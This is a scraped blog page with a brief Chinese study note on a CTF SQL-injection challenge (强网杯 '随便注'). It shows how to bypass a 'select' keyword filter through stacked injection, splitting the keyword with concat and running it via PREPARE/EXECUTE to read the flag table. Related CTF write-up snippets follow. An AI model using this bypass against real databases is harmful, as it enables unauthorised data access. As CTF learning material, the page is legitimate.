学习笔记 强网杯-随便注

最新推荐文章于 2022-09-26 00:27:54 发布
最新推荐文章于 2022-09-26 00:27:54 发布
阅读量252 收藏
点赞数
分类专栏: ctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sacrifice_li/article/details/106697453
版权

set @b=concat("sel","ect flag from `1919810931114514` ");

PREPARE:准备一条SQL语句,并分配给这条SQL语句一个名字供之后调用

prepage hello from @b;

EXECUTE :执行命令

execute hello;

 

即可在过滤了select的时候执行select命令

 

这题还有一个比较坑的地方,不知道是复现问题还是什么  如果使用  ''  这个去加表名的引号则不行

需要使用 `` 来当做引号

 

Sacrifice_li
关注
专栏目录
集成电路版图学习笔记1----版图基本知识
羊藤枝的博客
08-29 7万+
集成电路设计流程: Created with Raphaël 2.1.2设 计 方 案定 义 结 构 功能设计与仿真电路设计与仿真版图设计与仿真后 仿 真 流片与芯片测试大 规 模 生 产 由上图版图设计属于后端设计部分。 所谓集成电路版图设计就是指将电路设计电路图或电路描述语言映射到物理描述层面。 版图工程师的职责包括:芯片物理结构分析,逻辑分析,建立后端设计流程,版图...
PS学习笔记------运用脚本及自动化批量处理
AbuXiL的博客
05-30 7378
PS学习笔记------运用脚本及自动化批量处理简单脚本运行+自动批处理多图片简单脚本运行自动批处理图片 简单脚本运行+自动批处理多图片 本次实现的功能是: 1.运用脚本在ps中将图片的文档名称到插入图片中; 2.批量在图片中加上文档名称的文字,最后自动存储。 简单脚本运行 ps中有脚本的运行方式,我们首先要编辑好脚本,在ps中打开你要进行操作的图片,运行脚本即可。 脚本编写 ,可以用自带的ExtendScript进行编写,有装ps直接在电脑搜就好; 本脚本功能是给图片加上所对应的图片名称文字,并指定了插
[强网杯 2019]随便
1ance's blog
11-19 1743
文章目录环境解题思路其他姿势1其他姿势2总结参考 环境 [强网杯 2019]随便 BUUCTF启动靶机,获取链接 http://2849c7a6-b1b9-417c-8c48-ada29998e57d.node4.buuoj.cn:81/?inject=1 解题思路 访问链接,看到一个输入框。 输入1输出 array(2) { [0]=> string(1) "1" [1]=> string(7) "hahahah" } 输入2输出 array(2) { [0]=&gt
2021-8-18 [强网杯 2019]高明的黑客 知识点:python-threading 脚本编写
m0_51326092的博客
08-18 177
看了大佬博客,手动打一遍(相当于复制粘贴了),-_-|| 大佬博客: 强网杯 2019-高明的黑客 强网杯 2019-高明的黑客(考察代码编写能力) short-code 温馨提示: 当在本地测试的时候,php版本需要大于等于7.0 记录结果最好保存到一个文本文件中,因为直接在控制台很难找到!!!! import os import re import requests import threading import time print("开始时间:"+time.asctime(time.localtim
攻防世界-Web高手进阶区-supersqli(强网杯随便)
feng的博客
09-14 1837
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WP。 WP 首先进入环境,发现是SQL入。我们先简单的进行一些测试,发现是字符型入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union入的时候出现: return preg_match("/select|update|delete|drop|insert|
攻防世界 sql
weixin_63231007的博客
03-20 1834
攻防世界supersql 首先添加一个单引号1' --+发现出错。 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 使用order by可知表由2个字段: error 1054 : Unknown column '3' i
强网杯2019线上赛-misc
wyj_1216 House
05-29 1392
Misc: 题目名称 | 签到 | 题目即flag ​ 题目名称 | 鲲or鳗orGame | 一开始入了音频隐写的坑~ 费了半天劲,开始琢磨起game的点 分析这个game,发现了/rom/game.gb 于是找到了gba模拟器,发现了金手指的功能。 首先利用gba模拟器打开game ​ 然后,搜索金手指 ​ 意开始的指定数值为0 点击...
微波射频学习笔记12-------单节/多节定向耦合器的设计
Sil_sprout
05-20 7985
平行线耦合器 一、基本原理 两根紧挨着的微带线,一根通信号,因为电磁场的相互作用,另一根会有功率耦合。 当电磁波通过主线时,本身是携带电场和磁场的,由于两根传输线距离很近,类似电容,所以主线上的交变电流通过电容,将两股方向相反的电流耦合到耦合线上;同时根据电磁感应定律,磁场中的导线会产生方向相反的感应电流,故上图②端口和下图4端口会产生叠加的功率,而③口,因为电场和磁场产生电流的方向相反而抵消。正因此,③口称为隔离端,另一个口称为耦合端。 二、单节平行线耦合器结构 1.① 为信号输入;② 为耦合端口;③
openGauss学习笔记- - -初始与使用技巧
退役复学在校大学生,目光所至,皆为华夏
09-26 2万+
目录0 告诉读者1 初始openGauss1.1 openGauss概述:1.2 应用场景2 openGauss使用技巧openGauss数据库常用操作命令2.1以操作系统用户omm登录数据库主节点2.2常用SQL语言:openGauss是关系型数据库,采用客户端/服务器,单进程多线程架构;支持单机和一主多备部署方式,同时支持备机可读、双机高可用等特性。openGauss内核源自PostgreSQL,并着重在架构、事务、存储引擎、优化器等方向持续构建竞争力特性,在ARM架构的芯片上深度优化,并兼容X86架
Python学习笔记---merge和concat数据合并(1)
DiAsdream的博客
05-20 8173
Python学习笔记—merge和concat数据合并(1) Python学习笔记—merge和concat数据合并(2) 文章目录Python学习笔记---merge和concat数据合并(1)前言一、数据合并--merge二、操作步骤1.先合并其中2张表2.再合并第3张表总结 前言 数据处理中经常对多个表的数据进行合并处理,这个功能类似于SQL中的join 联表查询。python可用于联表的函数是merge和concat。 两者区别: 1、merge:只能用于两两合并,如果需要3张表合并,需要先进行
buucrf-web-随便
weixin_43345082的博客
08-16 1017
又学到个姿势 这道题是sql堆叠入 堆叠入自行百度 同时有过滤 做法是使用mysql预定义语句 PREPARE stmt from '你的sql语句'; EXECUTE stmt (如果sql有参数的话, USING xxx,xxx); // 这里USING的只能是会话变量 DEALLOCATE PREPARE stmt; 这三句话分别就是: 预定义好sql语句 执行预定义的sql 释放...
[原题复现]2019强网杯WEB-随便
笑花大王
02-06 689
HCTF 2018 Warmup 原题复现:https://gitee.com/xiaohua1998/qwb_2019_supersqli 考察知识点:SQL入漏洞-堆叠入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 做题过程 打开页面测试入点 //判断入点 存在入! ' and 1...
SQL Injection8(堆叠入)——强网杯2019随便
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
BUUCTF学习笔记-随便
weixin_42271850的博客
03-08 3240
BUUCTF学习笔记-随便 时间:2020/03/05 考点:堆叠入、SQL预编译语句。          打开发现是一个输入查询框,右键查看代码发现里面又一个提示sqlmap是没有灵魂的。估计这一题是SQL入,但提示应该不能直接用sqlmap,但还是先去尝试一下。  &nbsp...
2020强网杯部分题总结与复现
qwzf
08-31 3441
前言 前几天打了个两天一夜的强网杯比赛,整个人都快要起飞了。比赛后由于CISCN出题,没时间总结,现在总结和复现一下部分题。 强网杯 0x01 强网先锋:主动 考点:命令执行+绕过黑名单
2020强网杯线上赛部分题解
weixin_43610673的博客
08-25 2156
目录主动Funhashuploadweb辅助half_infiltration 主动 命令执行 只是过滤了关键字flag 通配符绕过即可 Funhash Level1用形如0e+纯数字且md4加密后依旧为0e+纯数字的值绕过 hash1=0e399638706240815825137256701449 这里难点主要是网上找不到符合要求的值,要自己写脚本碰撞 https://www.cnblogs.com/-mo-/p/11582424.html 我是拿md5的改了一下,然后跑了半天没出来,还好队
BUUCTF-强网杯-随便
wuerror的博客
06-30 6545
引用:https://www.cnblogs.com/Mikasa-Ackerman/p/11050033.html 1‘ //首先尝试的加引号,报错了 1’ # //正常 1‘ order by 1 # //用order by 测试得到列数为2 1' union select 1,2 # //回显了过滤规则 return preg_match("/select|update|delete|d...
XCTF攻防世界 Web高手进阶区 supersqli writeup
Senimo
04-01 1048
XCTF攻防世界 Web高手进阶区 supersqli writeup supersqli 难度系数: 3.0 题目来源: 强网杯 2019 题目描述:随便 启动靶机,打开环境: 详细writeup参考: BUUCTF [强网杯 2019] 随便 ...
【2020第四届“强网杯“全国网络安全挑战赛】强网先锋 Funhash
weixin_45844670的博客
08-24 1190
题目链接:http://39.101.177.96/ <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5(
"STM8学习笔记---定时器输出7路PWM波综合教程
本文介绍了STM8单片机中的定时器...以上是本文的主要内容,总结了STM8学习笔记中关于定时器输出7路PWM波的综合文档。通过详细描述定时器的功能和配置方法,希望读者能够理解并掌握在STM8单片机中实现PWM波输出的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值